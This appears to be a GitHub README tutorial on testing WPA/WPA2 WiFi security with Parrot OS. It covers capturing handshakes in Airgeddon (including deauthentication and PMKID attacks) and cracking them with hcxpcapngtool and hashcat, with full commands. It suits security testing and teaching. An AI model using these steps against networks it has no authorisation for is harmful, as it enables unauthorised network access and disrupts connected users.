Skip to content

Latest commit

 

History

History
96 lines (71 loc) · 4.95 KB

README.md

File metadata and controls

96 lines (71 loc) · 4.95 KB

Pentesting-Wifi-Security: A Step-by-Step Guide

Table of Contents

Contact

LinkedIn Facebook Instagram

Introduction

Wireless networks secured with WPA/WPA2 encryption are generally safe, but understanding how to test and ensure their security can be a valuable skill. This guide will walk you through the process of using Parrot OS and various tools to capture and decrypt WiFi network handshakes.

Step 1: Download and Install Parrot OS

  1. Download Parrot OS Linux Distro: Start by downloading the Parrot OS from Parrot Security.
  2. Download Balena Etcher: To create a bootable USB flash drive, download Balena Etcher from Balena Etcher.
  3. Burn the Image: Use Balena Etcher to burn the Parrot OS image to your USB flash drive.
  4. Boot from USB: Insert the USB flash drive into your computer and boot from it.

Step 2: Setting Up Parrot OS

  1. After booting into Parrot OS, click on "Applications" in the top left corner.
  2. Navigate to Pentesting -> Wifi Pentesting -> Airgeddon.

Step 3: Capturing the WiFi Network Handshake

What is a Handshake?

A handshake in WiFi terms is a process where a device connects to a network and exchanges keys to establish a secure connection. This exchange can be captured and used to attempt decryption of the network password.

Steps to Capture the Handshake

  1. Select Your WiFi Card: In Airgeddon, first select your WiFi card.
  2. Enable Monitor Mode: Choose option 2 to set your WiFi card into monitor mode, which allows it to capture all traffic on the network.
  3. Navigate to Handshake/PMKID Tools: Select option 5.
  4. Explore WiFi Networks: Choose option 4 to scan for nearby WiFi networks.
    • A window will pop up displaying available networks.
    • Stop the scan by pressing Ctrl + C.
  5. Select Desired Network: Choose the network you want to test.
  6. Capture Handshake: Select option 6.
    • You will be given three methods to attack and capture the handshake:
      1. Deauthentication attack to disconnect a client and force a reconnect.
      2. PMKID capture for WPA3 and WPA2 networks.
      3. Passive capture waiting for a client to connect.
    • After a successful attack, you will obtain a .cap file containing the handshake.

Step 4: Converting the Handshake File Offline

Instead of using an online tool, you can convert the .cap file to the .hc22000 format offline using tools available in Parrot OS.

  1. Convert .cap to .hc22000 offline: Use hcxpcapngtool from hcxtools to convert the .cap file:
    hcxpcapngtool -o output.hc22000 input.cap
    • Replace output.hc22000 with your desired output file name.
    • Replace input.cap with the name of your captured handshake file.

Step 5: Decrypting the Handshake with Hashcat

  1. Open a New Bash Shell: In Parrot OS, open a terminal.

  2. Run Hashcat: Use the following command to start decrypting the .hc22000 file:

    hashcat -m 22000 <your_.hc22000_file> <wordlist>
    • Replace <your_.hc22000_file> with the path to your converted handshake file.
    • Replace <wordlist> with the path to your wordlist file. Parrot OS includes wordlists in /usr/share/wordlists.

    For example:

    hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt

Additional Resources

For more options and detailed usage of Hashcat, refer to the help command:

hashcat --help

Conclusion

By following these steps, you can capture and attempt to decrypt WPA/WPA2 handshakes, allowing you to test the security of your own WiFi networks. Always ensure you have permission to test any network you do not own. This process is strictly for educational and security testing purposes.